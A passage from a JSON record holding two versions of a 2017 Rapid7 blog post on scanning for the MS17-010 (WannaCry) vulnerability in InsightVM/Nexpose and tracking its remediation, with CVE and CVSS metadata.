remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 6/7/17: Fixed a small error in the dynamic asset group/dashboard section. We also now have a pre-built WannaCry dashboards in InsightVM***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\"><img class=\"jive-image\" height=\"260\" src=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\" style=\"height: 280px; width: 815px;\" width=\"758\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:f234a140-3a4d-465a-bf33-b296a18e2137] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-06-07T14:57:05", "lastseen": "2017-06-07T15:18:07"}, "differentElements": ["description"], "edition": 7}, {"lastseen": "2017-05-20T04:49:54", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 16, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:2d29ad65-32b0-457f-8346-e45e3999e711] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p 